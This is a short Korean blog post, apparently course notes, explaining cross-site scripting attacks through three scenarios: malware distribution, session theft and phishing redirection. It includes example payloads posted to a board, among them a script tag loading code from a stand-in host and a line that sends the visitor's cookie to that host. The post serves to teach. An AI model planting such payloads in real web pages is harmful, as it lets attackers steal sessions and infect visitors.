XSS 취약점 공격이란?
- 클라이언트 스크립트 (Javascript, VBscript 등) 를 이용하여 사용자에게 특정 행위를 하게 해서 악의적인 목적으로 이용하는 것
XSS 취약점을 이용한 공격 유형
1. 악성코드 배포
- 공격자는 게시판에 악의적인 행위를 하는 스크립트를 삽입
<script src="http://www.malware.com/a.js"></script>- 사용자들이 해당 게시물에 접근했을 때 악성코드 배포사이트로 유도
- 사용자는 자신도 모르게 악성코드(랜섬웨어, 개인정보 유출 등)에 감염
2. 다른 사용자의 권한 획득
- 공격자는 게시판에 악의적인 행위를 하는 스크립트를 삽입 사용자들이 해당 게시물에 접근했을 때 자신의 쿠키 정보를 공격자 서버에 전달 및 저장
<script>document.write('<img src="http://malware.com/'+document.cookie+' ">');</script>- 공격자는 획득한 쿠키 정보를 이용하여 다른 사용자의 권한 획득
3. 피싱 사이트 유도
- 공격자는 게시판에 악의적인 행위를 하는 스크립트를 삽입
<script src="http://www.malware.com/a.js"></script>- 사용자들이 해당 게시물에 접근했을 때 자신도 모르게 조작된 사이트로 유도
- 공격자가 조작한 입력 부분에 사용자는 계정 정보 입력 및 공격자에게 전달
자료 출처
중앙대학교 산업보안학과 조정원 교수님 자료
'Hacking > Webhacking' 카테고리의 다른 글
| [Webhacking] 파일 업로드 취약점 공격 (0) | 2021.04.22 |
|---|---|
| [Webhacking] XSS 취약점 실습 (0) | 2021.04.15 |
| [Webhacking] Time based SQL Injection 실습 (0) | 2021.04.11 |
| [Webhacking] Blind SQL Injection 실습 (0) | 2021.04.11 |
| [Webhacking] Error Based SQL Injection 실습 (0) | 2021.04.10 |